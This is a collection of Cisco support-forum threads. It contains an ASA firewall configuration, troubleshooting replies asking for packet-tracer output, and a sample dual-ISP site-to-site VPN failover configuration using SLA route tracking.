hostname firewall
enable password (REMOVED) encrypted
passwd (REMOVED) encrypted
names
interface Ethernet0/0
switchport access vlan 2
interface Ethernet0/1
interface Ethernet0/2
interface Ethernet0/3
interface Ethernet0/4
interface Ethernet0/5
interface Ethernet0/6
interface Ethernet0/7
interface Vlan1
nameif inside
security-level 100
ip address 192.168.10.1 255.255.255.0
interface Vlan2
nameif outside
security-level 0
ip address 192.168.1.254 255.255.255.0
interface Vlan5
no nameif
security-level 50
ip address dhcp
ftp mode passive
object network obj_any
subnet 0.0.0.0 0.0.0.0
object network Server1
host 192.168.10.10
object network GoogleDNS1
host 8.8.8.8
description Google DNS Server
object network GoogleDNS2
host 8.8.4.4
description Google DNS Server
object network 192.168.10.x
subnet 192.168.10.0 255.255.255.0
object network InternetRouter
host 192.168.1.1
object-group network DM_INLINE_NETWORK_1
network-object object GoogleDNS1
network-object object GoogleDNS2
object-group service DM_INLINE_TCP_1 tcp
port-object eq www
port-object eq https
access-list inside_access_in remark External DNS Lookups
access-list inside_access_in extended permit udp object Server1 object-group DM_INLINE_NETWORK_1 eq domain
access-list inside_access_in extended permit tcp 192.168.10.0 255.255.255.0 any object-group DM_INLINE_TCP_1
access-list inside_access_in extended deny ip any any
pager lines 24
logging enable
logging asdm informational
mtu inside 1500
mtu outside 1500
icmp unreachable rate-limit 1 burst-size 1
no asdm history enable
arp timeout 14400
no arp permit-nonconnected
nat (inside,outside) source dynamic any interface
object network obj_any
nat (inside,outside) dynamic interface
access-group inside_access_in in interface inside
route outside 0.0.0.0 255.255.255.255 192.168.1.1 1
timeout xlate 3:00:00
timeout pat-xlate 0:00:30
timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02
timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 mgcp-pat 0:05:00
timeout sip 0:30:00 sip_media 0:02:00 sip-invite 0:03:00 sip-disconnect 0:02:00
timeout sip-provisional-media 0:02:00 uauth 0:05:00 absolute
timeout tcp-proxy-reassembly 0:01:00
timeout floating-conn 0:00:00
dynamic-access-policy-record DfltAccessPolicy
user-identity default-domain LOCAL
http server enable
http 192.168.1.0 255.255.255.0 inside
http 192.168.10.0 255.255.255.0 inside
no snmp-server location
no snmp-server contact
snmp-server enable traps snmp authentication linkup linkdown coldstart warmstart
crypto ipsec security-association pmtu-aging infinite
crypto ca trustpool policy
telnet timeout 5
ssh timeout 5
ssh version 2
console timeout 0
dhcpd auto_config outside
threat-detection basic-threat
threat-detection statistics access-list
no threat-detection statistics tcp-intercept
prompt hostname context
no call-home reporting anonymous
Cryptochecksum:(REMOVED)
: end
Just to be sure, can you post the output from show int ip brie and show route? And try to remove your ACL for testing purposes, or at least don't apply it anywhere yet.
Once done, try another packet-tracer to 8.8.8.8 using an icmp packet instead of UDP and paste the whole output here. Before doing this, add the icmp any any outside command on the ASA.
I know this shouldn't have anything to do with your issue, because if the ACL were the issue then you would see the packet being denied by the ACL in the packet tracer output. Let us know the results. -
ASA 5525X - Multiple Outside Interface
Hello,
Question:
I have a pair of ASA 5525X for VPN traffic; the interfaces are:
- Inside
- DMZ
- Outside - ISP1 - IP 1.1.1.1
Can I have two "outside" interfaces, with multiple ISPs for VPN traffic (site to site)?
- Inside
- DMZ
- Outside - ISP1 - IP 1.1.1.1
- Outside2 - ISP2 - IP 2.2.2.2
I need this because I have problems with only one ISP, so I need to install one more and, on the remote peer, add a second peer IP (for ISP2), so that if the remote peer cannot establish the connection over ISP1 it goes to ISP2. Is it possible?
Tks.
Rafael
Yes Rafael, it's possible.
You need to configure SLA monitoring on the ASA for the ISP failover.
And for the VPN, add the second ISP IP as a backup peer on the remote device.
On your ASA where you have dual ISP, the same crypto map will be applied on both interfaces.
In case you need any assistance regarding the configuration, let me know.
The configuration should look something like this:
interface Ethernet0
nameif outside
security-level 0
ip address 10.200.159.2 255.255.255.248
interface Ethernet2
nameif inside
security-level 100
ip address 172.22.1.163 255.255.255.0
interface Ethernet1
nameif backup
security-level 0
ip address 10.250.250.2 255.255.255.248
access-list outside_crypto_1 permit ip 172.22.1.0 255.255.255.0 (your internal private ip) x.x.x.x x.x.x.x (remote site internal ip you want to access)
access-list nonat permit ip 172.22.1.0 255.255.255.0 (your internal private ip) x.x.x.x x.x.x.x (remote site internal ip you want to access)
crypto ipsec transform-set ESP-3DES-MD5 esp-3des esp-md5-hmac
isakmp policy 20 authentication pre-share
isakmp policy 20 encryption 3des
isakmp policy 20 hash md5
isakmp policy 20 group 2
isakmp policy 20 lifetime 86400
crypto map outside_map 20 match address outside_crypto_1
crypto map outside_map 20 set peer x.x.x.x (Public ip of the remote site)
crypto map outside_map 20 set transform-set ESP-3DES-MD5
crypto map outside_map interface outside
crypto map outside_map interface backup
crypto isakmp enable backup
crypto isakmp enable outside
global (outside) 1 interface
global (backup) 1 interface
nat (inside) 1 172.22.1.0 255.255.255.0
nat (inside) 0 access-list nonat
tunnel-group x.x.x.x (public ip of the remote site) type ipsec-l2l
tunnel-group x.x.x.x ipsec-attributes
pre-shared-key cisco123
route outside 0.0.0.0 0.0.0.0 10.200.159.1 1 track 1
route backup 0.0.0.0 0.0.0.0 10.250.250.1 254
sla monitor 123
type echo protocol ipIcmpEcho 10.0.0.1 interface outside
num-packets 3
frequency 10
sla monitor schedule 123 life forever start-time now
track 1 rtr 123 reachability
Important Information:
===============================================
** With the use of track, the ASA keeps monitoring the MPLS interface (outside in this example) with ICMP packets. The moment it stops getting replies it flushes the primary route and starts pointing the routes toward the backup interface.
** The crypto map is applied on the backup interface as well, and the remote site should use the public IP of the backup interface as its VPN peer.
** As soon as the ASA starts getting replies from the outside interface again, it points the routes back toward the MPLS interface.
** I hope this answers your query.
Thanks
Jeet -
I have an ASA 5520 ver 8.4 with the following config:
WAN
207.211.25.34
Production
10.11.12.1 255.255.255.0
Mgmt
10.11.11.1 255.255.255.0
I need to create a peer-to-peer VPN to a remote site ASP16 from both Prod and Mgmt.
What would my NAT statement look like?
Currently I have the following but can only ping from Mgmt, not Prod (ASP17 is a network object group that contains the Prod and Mgmt subnets):
nat (Production,WAN) source static ASP17_VPN ASP17_VPN destination static ASP16 ASP16 no-proxy-arp route-lookup
nat (Mgmt,WAN) source static ASP17_VPN ASP17_VPN destination static ASP8_Prod ASP8_Prod
Hello Tejas,
After reading your configuration I can see that the crypto maps are applied to the outside interface, and the access-list for the interesting traffic has both networks (Management and Production), so you should be able to access the other network from this site.
Can you do the following packet tracers to see the features the ICMP packet is hitting when the request is sent?
I will need the output of the following commands:
1- Packet-tracer input Mgmt icmp 10.11.34.15 8 0 10.30.6.15
2-Packet-tracer input Production icmp 10.11.35.15 8 0 10.30.6.15
Please rate helpful posts,
Julio!!